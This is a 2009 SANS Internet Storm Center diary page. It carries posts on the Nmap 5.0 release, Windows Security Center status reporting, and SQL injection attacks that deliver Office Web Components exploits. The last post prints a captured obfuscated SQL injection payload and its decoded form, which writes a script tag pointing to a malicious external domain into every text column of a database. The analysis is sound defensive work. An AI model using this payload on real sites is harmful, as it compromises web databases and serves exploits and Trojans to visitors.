Threat Level: green Handler on Duty: Pedro Bueno

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Nmap 5.0 released

Published: 2009-07-16
Last Updated: 2009-07-16 17:51:07 UTC
by Bojan Zdrnja (Version: 1)
1 comment(s)

One of the must have tools for every person doing anything related to IT security is definitely Nmap (I mean, which other tool, besides an SSH exploit Trinity used as well (and that wasn't a fake SSH exploit like the one released couple of days ago)). The Nmap developers work hard on this latest version which includes some very cool things like the Nmap Scripting Engine (NSE) which we even used to detect machines infected with the Conficker worm.

There are a lot of other neat new features and improvements, so don't wait and go to http://nmap.org/5/ to download your copy of Nmap.

--
Bojan

Keywords: nmap
1 comment(s)

Changes in Windows Security Center

Published: 2009-07-16
Last Updated: 2009-07-16 11:10:42 UTC
by Guy Bruneau (Version: 1)
1 comment(s)

An ISC reader wrote in about a change that occurred this month with the Windows Security Center (WSC) where Microsoft expired the grace period used by vendors to report AV, firewall or anti-spyware status to the WSC. The new WSC API used to report to the WSC was supposed to expire in September 2009. The new API is a result of an interface change introduce in Windows Vista SP1 and part of Windows 7, replacing the API that was part of Vista's original release.

If you are seeing a red shield in the bottom right corner, your Malware Protection tab maybe indicating your AV "is on but it is reporting its status to Windows Security Center in a format that is no longer supported. Use the program's automatic updating feature, or contact the program manufacturer for an updated version".

The grace period to update to the new API to report the correct status to the WSC in Vista SP1 has expired earlier than anticipated, causing confusion on whether your vendor security software is protecting your PC.

This does not mean your AV, firewall or anti-spyware is not working and protecting your system but that it is no longer able to report correctly its status through the WSC. Monitor the WSC status regularly to ensure your AV, firewall or anti-spyware are updated on schedule and functioning properly.

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

Teaching Comprehensive Packet Analysis in Ottawa, ON this coming September

1 comment(s)

OWC exploits used in SQL injection attacks

Published: 2009-07-16
Last Updated: 2009-07-16 08:38:21 UTC
by Bojan Zdrnja (Version: 1)
0 comment(s)

As we thought, it was just a matter of time before more attackers start exploiting the still unpatched Office Web Components vulnerability.

While a day ago reports of exploits for this vulnerability were still a bit rare, yesterday Ken Hoover sent a log of an SQL injection attempt to his web site. The SQL injection attempt looks very much like the one we've been seeing for month – the attacker blindly tries to inject obfuscated SQL code:

';DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x44004500430…F007200 AS NVARCHAR(4000));
EXEC(@S);

After deobfuscation of the CAST function input, the following SQL code is revealed:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=hxxp://f1y.in/j.js></script>''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

As you can see, they are injecting a script code pointing to f1y.in, which is a known bad domain. This script contains links to two other web sites (www.jatrja.com and js.tongji.linezing.com) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability.

The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link) – only 15 AV programs detecting it, luckily, some major AV vendors are there.

If you haven't set those killbits yet, be sure that you do know because the number of sites exploiting this vulnerability will probably rise exponentially soon.

--
Bojan

0 comment(s)
Diary Archives